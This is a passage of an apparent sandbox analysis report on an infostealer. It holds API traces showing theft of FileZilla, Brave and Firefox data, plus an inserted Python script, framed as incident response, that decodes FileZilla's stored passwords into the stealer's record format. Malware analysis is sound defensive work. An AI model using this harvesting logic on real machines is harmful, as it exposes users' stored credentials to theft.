                                • lstrlen.KERNEL32(01021794), ref: 01001EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001EE3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F15
                                • lstrlen.KERNEL32(00D6DA50), ref: 01001F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F5F
                                • lstrlen.KERNEL32(01021794), ref: 01001F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F90
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001FC2
                                • lstrlen.KERNEL32(00D5A460), ref: 01001FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002036
                                • lstrlen.KERNEL32(01021794), ref: 01002048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002067
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01002073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002098
                                • lstrlen.KERNEL32(?), ref: 010020AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010020D0
                                • lstrcat.KERNEL32(00000000,?), ref: 010020DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002103
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100213F
                                • lstrlen.KERNEL32(00D6D398), ref: 0100214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002181
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 946f6f957dba3c0713bc8eb9ff3194880763a69b6aae5afdf4dff089d93a2922
                                • Instruction ID: af41d52dcbf73af26854f7b1a8f879c4e33b05d6462ad4efafd65c958cc0ac82
                                • Opcode Fuzzy Hash: 946f6f957dba3c0713bc8eb9ff3194880763a69b6aae5afdf4dff089d93a2922
                                • Instruction Fuzzy Hash: E962A63051161AABEB72EF68DC8DABF7BF9AF40700F040068FA45A7295DB78D941D790
                                APIs
                                • wsprintfA.USER32 ref: 0100392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 01003943
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100396C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01003986
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010039BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010039E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010039F2
                                • lstrlen.KERNEL32(01021794), ref: 010039FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A1A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003A26
                                • lstrlen.KERNEL32(?), ref: 01003A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A53
                                • lstrcat.KERNEL32(00000000,?), ref: 01003A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A8A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01003ACE
                                • lstrlen.KERNEL32(?), ref: 01003AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B36
                                • lstrlen.KERNEL32(01021794), ref: 01003B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B6A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B9E
                                • lstrlen.KERNEL32(?), ref: 01003BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 01003BE0
                                • lstrlen.KERNEL32(00D68980), ref: 01003C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003C3C
                                • lstrlen.KERNEL32(00D68920), ref: 01003C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003CB7
                                • lstrlen.KERNEL32(01021794), ref: 01003CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003CE8
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003D79
                                • lstrlen.KERNEL32(01021794), ref: 01003D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003DAD
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E43
                                • lstrlen.KERNEL32(01021794), ref: 01003E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E77
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F0D
                                • lstrlen.KERNEL32(01021794), ref: 01003F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F41
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F75
                                • lstrlen.KERNEL32(?), ref: 01003F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 01003FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003FE0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100401F
                                • lstrlen.KERNEL32(00D6D398), ref: 0100402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010040CE
                                • lstrcat.KERNEL32(00000000), ref: 010040DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 010042D9
                                • FindClose.KERNEL32(00000000), ref: 010042E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: same sixteen dump regions (00FF0000 through 01672000) as listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: f54134f78ac8f3a164ab19d19ea5f83af0d74795671a5b2db695419741c3c4df
                                • Instruction ID: 9de7fc7b02868de6992c9c6300de636e49f93ec9aee41710407872d3755f974d
                                • Opcode Fuzzy Hash: f54134f78ac8f3a164ab19d19ea5f83af0d74795671a5b2db695419741c3c4df
                                • Instruction Fuzzy Hash: AD62C730910619AFEB73AF69DC49AAE77F9BF40304F044168FA45E7290DB78D941DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 010069C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01006A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 01006A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 01006AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 01006B35
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006B9D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: same sixteen dump regions (00FF0000 through 01672000) as listed for the functions above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 49ca1323e9158cc262e79445e3c3243a14a138333ae8ed82b69cb2a4e36905c6
                                • Instruction ID: 5752d0be7c7aede1052a351c935a89f22eb05de77cf1d633fd3aa8bc5e22ae70
                                • Opcode Fuzzy Hash: 49ca1323e9158cc262e79445e3c3243a14a138333ae8ed82b69cb2a4e36905c6
                                • Instruction Fuzzy Hash: 8642F530900219ABFB72AFB9DC4DBAE7BB9AF04700F045458F681EB295DB78D941DB50
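                                The routine above resolves the user profile directory with SHGetFolderPathA (CSIDL 0x28 is CSIDL_PROFILE), appends \AppData\Roaming\FileZilla\recentservers.xml, and pulls the <Host>, <Port>, <User> and <Pass encoding="base64"> elements out of it; the string table also carries the labels "browser: FileZilla", "profile: null", "url: ", "login: " and "password: " that the harvested record is built from. The practical point for incident response is that FileZilla's base64 "encoding" is not encryption, so every server in that file must be treated as compromised once this sample has run. The script below is an added example written for this page (it is not code from the sample, from FileZilla or from Joe Sandbox) that reads such a file and recovers the same four fields so the exposed accounts can be listed for rotation. The XML is a constructed sample in FileZilla's layout, and the exact record layout (field order, newline separators, host:port in the url line) is an assumption; only the labels come from the trace.

```python
"""Added example: recover FileZilla recentservers.xml credentials the way the
traced Stealc routine does, to enumerate accounts that need rotation.
Not code from the sample, FileZilla or Joe Sandbox; sample XML is constructed."""
import base64
import xml.etree.ElementTree as ET

# Suffix the trace appends to the CSIDL_PROFILE (0x28) directory.
FILEZILLA_RECENT_SERVERS = r"\AppData\Roaming\FileZilla\recentservers.xml"

# Constructed sample in FileZilla's recentservers.xml layout (not from a real host).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def recent_servers_path(profile_dir):
    """Build the same path the sample builds from the CSIDL_PROFILE directory."""
    return profile_dir.rstrip("\\") + FILEZILLA_RECENT_SERVERS


def parse_recent_servers(xml_text):
    """Return one dict per <Server> with the four fields the trace looks for.

    <Pass encoding="base64"> is plain base64, not encryption: anything that can
    read the file recovers the password, which is exactly what the sample does.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    entries = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        pass_el = server.find("Pass")
        if pass_el is None or not pass_el.text:
            password = ""  # anonymous or key-based logon: nothing stored to steal
        elif pass_el.get("encoding") == "base64":
            password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
        else:
            password = pass_el.text  # older FileZilla builds stored plaintext
        entries.append({"host": host, "port": port, "user": user, "password": password})
    return entries


def format_exfil_record(entry):
    """Lay one entry out with the labels from the sample's string table.

    Field order, the newline separator and "host:port" in the url line are
    assumptions; only the labels themselves appear in the trace.
    """
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {entry['host']}:{entry['port']}",
        f"login: {entry['user']}",
        f"password: {entry['password']}",
    ])


if __name__ == "__main__":
    # Offline demo on the constructed sample. On a live host, read the file at
    # recent_servers_path(os.environ["USERPROFILE"]) instead.
    for e in parse_recent_servers(SAMPLE_XML):
        print(format_exfil_record(e), end="\n\n")
```

Run it against a copy of the real file taken from an affected user profile; every host it prints is a credential the stealer had in plaintext, and the second sample entry (no <Pass> element) shows that key-based or anonymous logons leave nothing for it to harvest.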
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDBEF
                                • lstrlen.KERNEL32(01024CA8), ref: 00FFDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC17
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 00FFDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC4C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDC8F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FFDCD0
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FFDCF0
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FFDD0A
                                • lstrlen.KERNEL32(0101CFEC), ref: 00FFDD1D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDD7B
                                • lstrlen.KERNEL32(01021794), ref: 00FFDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDA3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDDAF
                                • lstrlen.KERNEL32(?), ref: 00FFDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDE19
                                • lstrlen.KERNEL32(01021794), ref: 00FFDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDE6F
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDE7B
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDEBB
                                • lstrlen.KERNEL32(01021794), ref: 00FFDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDEE6
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDEF2
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFA5
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDFB1
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDFF4
                                • lstrlen.KERNEL32(01021794), ref: 00FFDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE022
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFE02E
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00FFE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FFE0E7
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE11F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FFE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE155
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE19F
                                • lstrcat.KERNEL32(00000000), ref: 00FFE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE1F9
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE22F
                                • lstrlen.KERNEL32(00D68980), ref: 00FFE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE261
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FFE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00FFE988
                                • FindClose.KERNEL32(00000000), ref: 00FFE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: same sixteen dump regions (00FF0000 through 01672000) as listed for the functions above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: dd192ed216083b2e59727e866b9f3c7ec661c699a51b21c073c1b747c74c6b69
                                • Instruction ID: fbf7cf3f28b03679855891eecbcd6cb3540b44be26a14c9402886ecb55b05791
                                • Opcode Fuzzy Hash: dd192ed216083b2e59727e866b9f3c7ec661c699a51b21c073c1b747c74c6b69
                                • Instruction Fuzzy Hash: D7527D31E1021EABDB31AF65DC89ABE77B9AF44310F044028FA45E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF60FF
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6152
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6185
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF61B5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF61F0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: bfb99edc8bc5baad26d4190ffd5ce525a65c9b1f6edc545a8a0a7d40ff6cb82a
                                • Instruction ID: 102e6453c226a05559627c17df9aab4c1d971f2238f7722f60b30106e77f8115
                                • Opcode Fuzzy Hash: bfb99edc8bc5baad26d4190ffd5ce525a65c9b1f6edc545a8a0a7d40ff6cb82a
                                • Instruction Fuzzy Hash: 75524F31D1021AABDB31EFB4DC49AAE77B9AF04310F144028FA45E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF4C7F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4CD2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D05
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D35
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4D73
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: c7719cc128ad612824e2b10b3514615110bd0d0fcb6156194fb2d7ec985766c6
                                • Instruction ID: 583ccb9f0894b089d34a8445f2afa5c35313a47b88289ce5ba5424eeb337f035
                                • Opcode Fuzzy Hash: c7719cc128ad612824e2b10b3514615110bd0d0fcb6156194fb2d7ec985766c6
                                • Instruction Fuzzy Hash: F4528231D0121A9BDF31EFA4DC49BAE77B9AF04710F145028FA45EB264DB78ED429B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006B9D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BCD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BFD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 01006C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01006C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 01006C5A
                                • lstrlen.KERNEL32(00000000), ref: 01006C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 01006CE2
                                • lstrlen.KERNEL32(00000000), ref: 01006CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 01006D6A
                                • lstrlen.KERNEL32(00000000), ref: 01006D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01006DF2
                                • lstrlen.KERNEL32(00000000), ref: 01006E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 01006E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 01006EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01006EC9
                                • LocalFree.KERNEL32(00000000), ref: 01006ED4
                                • lstrlen.KERNEL32(?), ref: 01006F6E
                                • lstrlen.KERNEL32(?), ref: 01006F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: e09b3028be84de6e169f83cbe99454d9974df4cb22899bde5dfe7002bfaf62e0
                                • Instruction ID: fde434e9c9c281331e51cdfc64c6c6c3e7c7b3980cd2e4dbf5725607249ffbbb
                                • Opcode Fuzzy Hash: e09b3028be84de6e169f83cbe99454d9974df4cb22899bde5dfe7002bfaf62e0
                                • Instruction Fuzzy Hash: A202E530A00219AFEB72EFB8DC4DEAE7BB9AF04704F141458FA41EB295DB78D9419750
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004B7F
                                • lstrlen.KERNEL32(01024CA8), ref: 01004B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BA7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 01004BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01004BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 1623dbcb7a5358988ffb4f11d858d7d5335aee2c5b84a3a73afd2cdf91ebbf6d
                                • Instruction ID: ad33ad5af67fb561c827449a8c10887769d2e70581e15286e2361695cab66963
                                • Opcode Fuzzy Hash: 1623dbcb7a5358988ffb4f11d858d7d5335aee2c5b84a3a73afd2cdf91ebbf6d
                                • Instruction Fuzzy Hash: 7A929F30A012059FFBA6CF2DD948B69BBE5AF44318F1980ADE949DB2A1D775DC81CF40
                                APIs
